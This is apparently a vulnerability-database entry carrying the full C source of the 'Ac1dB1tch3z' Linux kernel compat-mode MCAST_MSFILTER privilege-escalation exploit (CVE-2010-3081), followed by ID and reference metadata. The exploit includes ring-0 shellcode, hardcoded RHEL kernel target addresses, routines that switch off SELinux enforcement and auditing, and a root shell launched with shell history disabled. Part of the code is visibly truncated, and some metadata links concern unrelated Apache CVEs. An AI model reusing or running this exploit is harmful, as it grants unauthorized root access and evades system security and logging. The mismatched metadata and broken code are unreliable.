sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 15024

EXPLOIT

Ac1dB1tch3z Vs Linux Kernel x86_64 0day

Today is a sad day..

R.I.P.
Tue, 29 Apr 2008 / Tue, 7 Sep 2010

a bit of history:
MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one)

author David L Stevens <dlstevens () us ibm com>
Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
committer David S. Miller <davem () davemloft net>
Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
This patch adds support for getsockopt for MCAST_MSFILTER for
both IPv4 and IPv6. It depends on the previous setsockopt patch,
and uses the same method.

Signed-off-by: David L Stevens <dlstevens () us ibm com>
Signed-off-by: YOSHIFUJI Hideaki <yoshfuji () linux-ipv6 org>
Signed-off-by: David S. Miller <davem () davemloft net>
------------------------------------------------------------

Thank you for signing-off on this one guys.

This exploit has been tested very thoroughly
over the course of the past few years on many many targets.

Thanks to redhat for being nice enough to backport it into early
kernel versions (anything from later August 2008+)

Ac1dB1tch3z would like to say F*** YOU Ben Hawkes. You are a new hero! You saved the
plan8 man. Just a bit too l8.

PS:
OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right ;))

#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <errno.h>

#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!# () #"
#else
#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

#define VERT "\033[32m"
#define NORM "\033[0m"
#define BANNER VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n"

#define KALLSYMS "/proc/kallsyms"
#define TMAGIC_66TDFDRTS "/proc/timer_list"
#define SELINUX_PATH "/selinux/enforce"
#define RW_FOPS "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD "revert_creds"
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000

#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4

#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20

#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40

#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))

#define TRY_REMAP_DEFAULT 1

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=0, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];

#define R0C_0FF 14
static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";

#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";

#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";

/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";

#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23
static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";

/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

struct LSM_rhel
{
__yyrhdgdtfs66ytgetrfd selinux_ops;
__yyrhdgdtfs66ytgetrfd capability_ops;
__yyrhdgdtfs66ytgetrfd dummy_security_ops;

__yyrhdgdtfs66ytgetrfd selinux_enforcing;
__yyrhdgdtfs66ytgetrfd audit_enabled;

const char *krelease;
const char *kversion;

};

struct LSM_rhel known_targets[4]=
{
{
0xffffffff8031e600ULL,
0xffffffff8031fec0ULL,
0xffffffff804acc00ULL,

0xffffffff804af960ULL,
0xffffffff8049b124ULL,

"2.6.18-164.el5",
"#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes
},
{
0xffffffff8031f600ULL,
0xffffffff80320ec0ULL,
0xffffffff804afc00ULL,

0xffffffff804b2960ULL,
0xffffffff8049e124ULL,

"2.6.18-164.11.1.el5",
"#1 SMP Wed Jan 6 13:26:04 EST 2010"
},
{
0xffffffff805296a0ULL,
0xffffffff8052af60ULL,
0xffffffff806db1e0ULL,

0xffffffff806ddf40ULL,
0xffffffff806d5324ULL,

"2.6.18-164.11.1.el5xen",
"#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen
},
{
0xffffffff8031f600ULL,// d selinux_ops
0xffffffff80320ec0ULL,// d capability_ops
0xffffffff804afc00ULL,// B dummy_security_ops

0xffffffff804b2960ULL,// B selinux_enforcing
0xffffffff8049e124ULL,// B audit_enabled

"2.6.18-164.11.1.el5",
"#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
}

};

static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;

struct socketcallAT
{
int s;
int level;
int optname;
void *optval;
volatile socklen_t *optlen;
}__attribute__((packed));

struct idt64from32_s
{
unsigned short limit;
unsigned long base;
}__attribute__((packed));

static __yyrhdgdtfs66ytgetrfd getidt()
{
struct idt64from32_s idt;
memset(&idt, 0x00, sizeof(struct idt64from32_s));
asm volatile("sidt %0" : "=m"(idt));
return idt.base | 0xFFFFFFFF00000000ULL;
}

static int isSelinuxEnabled()
{
FILE *selinux_f;
selinux_f = fopen(SELINUX_PATH, "r");
if(selinux_f == NULL)
{
if(errno == EPERM)
return 1;
else
return 0;
}

fclose(selinux_f);
return 1;
}

static int wtfyourunhere_heee(char *out_release, char* out_version)
{
int ret; const char*ptr;
int count=0;
char r[32], *bptr;
struct utsname buf;
ret = uname(&buf);

if(ret < 0)
return -1;

strcpy(out_release, buf.release);
strcpy(out_version, buf.version);

ptr = buf.release;
bptr = r;
memset(r, 0x00, sizeof(r));
while(*ptr)
{
if(count == 2)
{
if(*ptr >= '0' && *ptr <= '9')
*bptr++ = *ptr;
else
break;
}

if(*ptr == '.')
count++;
ptr++;
}

if(strlen(r) < 1 || !atoi(r))
return -1;

return atoi(r);
}

static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
}

static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
FILE *ka;
char line[512];
char reloc_a[64];
char reloc[64];

if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
return 0;

ka = fopen(filename, "r");
if(!ka)
return 0;

while(fgets(line, 512, ka) != NULL)
{
char *l_p = line;
char *ra_p = reloc_a;
char *r_p = reloc;
memset(reloc, 0x00, sizeof(reloc));
memset(reloc_a, 0x00, sizeof(reloc_a));
while(*l_p != ' ' && (ra_p - reloc_a) < 64)
*ra_p++ = *l_p++;
l_p += 3;
while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
*r_p++ = *l_p++;

if(!strcmp(reloc, s))
{
__gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a);
return strtoull(reloc_a, NULL, 16);
}
}

return 0;
}

static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
return get_sym_ex(s, KALLSYMS, 0);
}

static int parse_cred(const char* val)
{
int i=0;
const char* p = val;
char local[64], *l;
for(i=0; i<3; i++)
{
memset(local, 0x00, sizeof(local));
l = local;
while(*p && *p != ',')
*l++ = *p++;

if(!(*p) && i != 2)
return -1;

_m_cred[i] = strtoull(local, NULL, 16);
p++;
}

return 0;
}

#define SELINUX_OPS "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS "capability_ops"
#define SELINUX_ENFORCING "selinux_enforcing"
#define AUDIT_ENABLED "audit_enabled"

struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
int i;
char mapbuf[128];
struct LSM_rhel *lsm = &(known_targets[0]);

if(check_rhel && !isRHHGDPPLADSF(krelease))
{
__pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n");
return NULL;
}

__pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n");
for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
{
if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))
{
__gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
return lsm;
}
}

__pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n");
strcpy(mapbuf, "/boot/System.map-");
strcat(mapbuf, krelease);

dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);

if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
!dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
!dyn4nt4n1labeggeyrthryt.capability_ops ||
!dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
!dyn4nt4n1labeggeyrthryt.audit_enabled)
return NULL;

return &dyn4nt4n1labeggeyrthryt;
}

static void put_your_hands_up_hooker(int argc, char *argv[])
{
int fd,ver,ret;
char __b[16];

fd = open(KALLSYMS, O_RDONLY);
ret = read(fd, __b, 16); // dummy read
if((fd >= 0 && ret > 0))
{
__pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0
flags |= KERN_HHSYPPLORQTWGFD;
}
close(fd);

ver = wtfyourunhere_heee(krelease, kversion);
if(ver < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n");

__gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease);

if(argc != 1)
{
while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0)
{
switch(ret)
{
case 'i':
flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
useidt=1; // u have to use -i to force IDT Vector
break;

case 'f':
flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
break;

case 'l':
flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
break;

case 'c':
if(!optarg || parse_cred(optarg) < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n");
break;

case 'k':
if(optarg)
_m_fops = strtoull(optarg, NULL, 16);
else
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n");
break;

case 's':
if(!isSelinuxEnabled())
__pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n");
else
flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
break;

case 'o':
if(optarg)
_m_cpu_off = strtoull(optarg, NULL, 16);
else
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
break;
}
}
}

if(ver >= 29) // needs cred structure
{
flags |= KERN_DGGDYDTEGGETFDRLAK;

if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
{
_m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
_m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
_m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
}

if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
{
__yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
}

__pppp_tegddewyfg("$$$ Kernel Credentials detected\n");
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
}

if(ver >= 30) // needs cpu offset
{
flags |= KERN_DHHDYTMLADSFPYT;
if(!_m_cpu_off)
_m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);

if(!_m_cpu_off)
__yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");

__pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
*((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
*((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
}
}

static void env_prepare(int argc, char* argv[])
{

put_your_hands_up_hooker(argc, argv);

if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops
{
__pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n");
if(!_m_fops)
_m_fops = get_sym(RW_FOPS);

/* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
* Thanks to the guy who killed this vector... you know who you are:)
* Lucky for you, there are more:)
*/

if(_m_fops)
{
usefops=1;
__pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n");
}
}

if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)
{
curr_target = lsm_rhel_find_target(1);
if(!curr_target)
{
__pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n");
}
else
uselsm=1;
}

if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
{
// -i flag
curr_target = lsm_rhel_find_target(0);
if(!curr_target)
{
__pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n");
/* remove Selinux Flag */
flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
}
}

if(!usefops && !useidt && !uselsm)
__yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l\n");
}

static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
int socklen_l = 8 + stack - addr - 16;
return socklen_l;
}

static struct socketcallAT at;
static __dgdhdytrg55 idtover[4] =
{0x00100000UL,
0x0020ee00UL,
0x00000000UL,
0x00000000UL};

static void fillsocketcallAT()
{
at.s = s;
at.level = SOL_IP;
at.optname = MCAST_MSFILTER;
at.optval = buffer;
at.optlen = &magiclen;
}

static void bitch_call(struct socketcallAT *at, void *stack)
{
asm volatile(
"push %%ebx\t\n"
"push %%esi\t\n"
"push %%ecx\t\n"
"push %%edx\t\n"
"movl $0x66, %%eax\t\n"
"movl $0xf, %%ebx\t\n"
"movl %%esp, %%esi\t\n"
"movl %0, %%ecx\t\n"
"movl %1, %%esp\t\n"
"int $0x80\t\n"
"movl %%esi, %%esp\t\n"
"pop %%edx\t\n"
"pop %%ecx\t\n"
"pop %%esi\t\n"
"pop %%ebx\t\n"
: : "r"(at), "r"(stack) : "memory", "eax", "ecx", "ebx", "esi"
);
}

static void __setmcbuffer(__dgdhdytrg55 value)
{
int i;
__dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
*(p+i) = value;
}

static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase)
{
int i;
__dgdhdytrg55 curr;
for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++)
{
curr = idtover[i];
__setmcbuffer(curr);
magiclen = get_socklen(idtbase + (i*4), Y0Y0STOP);
bitch_call(&at, (void*)Y0Y0STOP);
}
}

static void y0y0stack()
{
void* map = mmap((void*)Y0Y0SMAP,
PAGE_SIZE,
PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}

static void y0y0code()
{
void* map = mmap((void*)Y0Y0CMAP,
PAGE_SIZE,

}

static int rey0y0code(unsigned long old)
{
int fd;
void *map;
volatile char wizard;
char cwd[1024];

getcwd(cwd, sizeof(cwd));
strcat(cwd, "/__tmpfile");

unlink(cwd);
fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
if(fd < 0)
return -1;

write(fd, (const void*)old, PAGE_SIZE);
if(munmap((void*)old, PAGE_SIZE) < 0)
return -1;

map = mmap((void*)old,
PAGE_SIZE,
PROT_READ|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED,
fd,0);
if(map == MAP_FAILED)
return -1;

/* avoid lazy page fault handler
* Triple Fault when using idt vector
* and no pages are already mapped:)
*/

wizard = *((char*)old);
unlink(cwd);
return wizard;
}

int main(int argc, char*argv[])
{
int uid,fd;
__yyrhdgdtfs66ytgetrfd *patch, idtb;
struct pollfd pfd;

printf(BANNER);

uid = getuid();

env_prepare(argc, argv);

y0y0stack();
y0y0code();

if(useidt)
{
idtb = getidt();
__gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb);
__pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n");
patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
*patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

__pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");

if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
{
__pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
p4tch_sel1nux_codztegfaddczda(curr_target);
}

__dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
}
else if(usefops || uselsm)
{
__pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n");
patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
*patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

__setmcbuffer(J0J0S);

__pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");
if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
{
__pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
p4tch_sel1nux_codztegfaddczda(curr_target);
}
__dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
}

/* set shellcode level 2 */
if(flags & KERN_DGGDYDTEGGETFDRLAK)
{
__pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n");
__dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
}
else
{
__pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n");
__dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc));
*((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
}

__pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n");
s = socket(AF_INET, SOCK_DGRAM, 0);
if(s < 0)
__xxxfdgftr_hshsgdt("socket");

fillsocketcallAT();

#ifdef TRY_REMAP_DEFAULT
if(rey0y0code(Y0Y0CMAP) < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n");
#endif

if(useidt)
{

__yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
__gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd);
idt_smash((idtentry));

sleep(1);
asm volatile("int $0xdd\t\n");
}
else if(usefops)
{
magiclen = get_socklen(_m_fops, Y0Y0STOP);
magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
__gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen);

__pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n");
bitch_call(&at, (void*)Y0Y0STOP);
sleep(1);

fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
if(fd < 0)
__xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st");

pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);
}
else if(uselsm)
{
int msqid;
__yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
__yyrhdgdtfs66ytgetrfd dummy_msg_off = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
__yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);

msqid = msgget(0, IPC_PRIVATE|0600);
if(msqid < 0)
__xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t");

magiclen = get_socklen(selinux_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);

magiclen = get_socklen(dummy_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(dummy_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);

magiclen = get_socklen(capability_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(capability_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);

msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it
}

munmap((void*)Y0Y0CMAP, PAGE_SIZE);

/* exec */
if(getuid() == 0)
{
pid_t pid;
__pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n");
pid = fork();
if(pid == 0)
{
char *args[] = {"/bin/sh", "-i", NULL};
char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
execve("/bin/sh", args, envp);
}
else
{
int status;
waitpid(pid, &status, 0);
}
}
else
__pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!\n");

close(s);
return 0;
}

#endif // -m32

Trust: 1.0

sources: EXPLOIT-DB: 15024

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 15024

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 15024

TYPE

'compat' Local Privilege Escalation

Trust: 1.0

sources: EXPLOIT-DB: 15024

CREDITS

Ac1dB1tCh3z

Trust: 1.0

sources: EXPLOIT-DB: 15024

EXTERNAL IDS

db:	NVD	id:	CVE-2010-3081	Trust: 1.0
db:	EXPLOIT-DB	id:	15024	Trust: 1.0
db:	NVD	id:	CVE-2012-0053	Trust: 0.8
db:	JUNIPER	id:	JSA10642	Trust: 0.6
db:	JUNIPER	id:	JSA10585	Trust: 0.6
db:	PACKETSTORM	id:	109284	Trust: 0.5
db:	HITACHI	id:	HS12-033	Trust: 0.3
db:	BID	id:	51706	Trust: 0.3
db:	JUNIPER	id:	JSA10658	Trust: 0.3
db:	NVD	id:	CVE-2011-3368	Trust: 0.3
db:	BID	id:	49957	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 15024

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2010-3081	Trust: 1.0
url:	http://support.avaya.com/css/p8/documents/100158872	Trust: 0.6
url:	http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03231301&ac.admitted=1332965374461.876444892.492883150	Trust: 0.6
url:	http://httpd.apache.org/	Trust: 0.6
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10642&cat=sirt_1&actp=list	Trust: 0.6
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10585	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2012-0053	Trust: 0.5
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302	Trust: 0.3
url:	https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03691745	Trust: 0.3
url:	http://httpd.apache.org/security/vulnerabilities_20.html	Trust: 0.3
